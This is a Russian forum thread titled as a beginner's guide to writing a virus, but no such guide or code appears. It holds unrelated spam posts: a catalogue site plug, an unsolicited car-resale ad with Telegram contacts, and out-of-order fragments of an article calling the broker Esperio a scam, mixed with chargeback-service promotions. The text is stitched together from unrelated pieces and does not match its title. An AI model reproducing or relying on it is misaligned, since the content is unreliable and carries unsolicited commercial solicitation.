Ждем ваших запросов на asiancatalog.ru!

0

7

thank you very much

0

8

Сотрудничество, Анастасия

Здравствуйте! Меня зовут Анастасия. Извините, что не совсем по теме)
Я не бот, просто листала ваш сайт и решила сделать для вас что-то хорошее)

Мы привозим автомобили из Германии в Россию. Завозим большими партиями.
Вот наш сайт: avtotrade-russia.ru
Telegram: t.me/avto_europe

До 5% наших клиентов отказываются от авто по разным причинам, внеся до 50% стоимости. На такие авто мы оперативно ищем новых заказчиков, цена получается невероятно выгодной! Раньше перепродавали кому-то из компании, сейчас объёмы выросли, ищем новые рынки сбыта.
Периодически публикуем варианты по выгодной цене в нашем telegram. Там есть и мой контакт – t.me/avto_europe

С уважением к вам.

0

9

Такой простой метод позволяет отсечь вымышленные координаты, которыми часто прикрываются мошенники, а также полюбоваться на заявленные места головных офисов. Этот простой метод не подвёл и с «Эсперио».

В футере сайта, а также в шапке клиентского договора указан один и тот же адрес на Сент-Винсент и Гренадинах: First Floor, First St. Vincent Bank Ltd Building, James Street, Kingstown. Здание действительно существует, и оно напрямую связано с финансовой системой. Находится в нём ровно то, что мошенники не удосужились вычистить из адреса: First St. Vincent Bank Ltd Building. То есть главный банк страны.

Несмотря на миниатюрность учреждения в карликовом государстве, офшорный банк не бедствует и уж точно не докатился до сдачи в аренду первого этажа здания всяческим проходимцам. Банкам по любым протоколам безопасности запрещается делить помещения с любыми арендаторами, поскольку это создаёт дополнительную уязвимость.

Ровно этим же адресом прикрылись лохоброкеры Pro Trend и Moon X. При этом признаков клонирования у этих ресурсов с Esperio нет, так что скорее мы имеем дело с новым популярным резиновым адресом. Выбор удачный: координаты ещё не растиражированы по сотням и тысячам сайтов, рисков, что на далёкий офшорный остров нагрянет русскоязычный клиент мало. Да ещё и поверхностная проверка через поисковик покажет, что адрес существует и там что-то про финансы. Так что для целей мошенников отлично подходит.

Чарджбэк для возврата средств на карту
Детальное руководство от экспертов
Не менее полезно проверять реальный стаж компаний. В большинстве случаев его выдаёт доменное имя. Esperio уверяет, что работает на благо трейдеров с 2011 года, однако проверка по доменному имени изобличает эту ложь. Сайт esperio.org пустили в дело только в мае 2022 года. Это зеркало, как и все прочие засветившиеся на скриншоте Центробанка РФ доменные имена лжеброкера, созданы в середине 2021 года. То есть лоховозка работает не более 1 календарного года. Впрочем, это солидный срок: большинство её коллег не преодолевают рубежа в несколько месяцев. Однако речи о солидном стаже и соответствии заявленному в легенде 2011 году не идёт.

Как чёрный брокер Esperio маскируется под нормального

0

10

Содержание статьи

Проверка информации о компании «Эсперио»
Не дайте мошенникам присвоить свои деньги!
Адрес и стаж как признаки мошенничества Esperio
Чарджбэк для возврата средств на карту
Отзывы о «Эсперио»
Схема развода «Эсперио»
Заключение
На первый взгляд у компании приличный мультиязычный сайт, а также достаточное количество юридической и прочей информации. Однако стоит начать всерьёз проверять легенду «Эсперио» — как она начинает рассыпаться на глазах.

«Вся Правда» приглашает разобрать компанию по косточкам, заодно потренировавшись выводить подобных лжеброкеров на чистую воду.

Проверка информации о компании «Эсперио»
Кладезем базовых юридических данных являются документы и футер сайта, заполненный очень мелким, слепым шрифтом. Поэтому удобнее обращаться к разделу «Правовая информация», который сослали на третий уровень интернет-ресурса, в категорию «О компании».

Первое, что бросается в глаза в этой самой правовой информации, это отсутствие обоих ключевых для каждого брокера документов:

скан-копии свидетельства о регистрации,
бланка лицензии на брокерскую деятельность.
Это настораживающий фактор, который сразу понижает степень доверия к Esperio. А ключевые сведения будем выяснять самостоятельно, перепроверяя отрывочную информацию из футера официального сайта и из шапки клиентского соглашения.

Как чёрный брокер Esperio маскируется под нормального

Итак, заявлено, что сайтом управляет компания OFG Cap. Ltd с регистрацией на Сент-Винсент и Гренадинах. Это островное офшорное государство давно является прибежищем сомнительных компаний, которые покупают местную регистрацию по вполне доступной цене. Однако для этого нужно предпринять хотя бы минимальный набор действий и подать скромный пакет документов.

Не дайте мошенникам присвоить свои деньги!
Узнайте, как обезопасить свои финансы
Проверить, было ли это сделано на самом деле, легко. Достаточно на сервисе info-clipper или подобном агрегаторе юридических лиц разных стран мира выбрать интересующее государство и ввести название компании. Если результат не найден, значит, такого юрлица в стране не зарегистрировано. Показываем на скриншоте, что брокер лжёт о своей якобы материнской компании (хотя формулировка про управление сайтом не тянет даже на подобный статус). Компания Esperio на островах также не зарегистрирована.

0


Вы здесь » LM | Forum » Статьи/Полезное » Как написать Вирус [Для начинающего]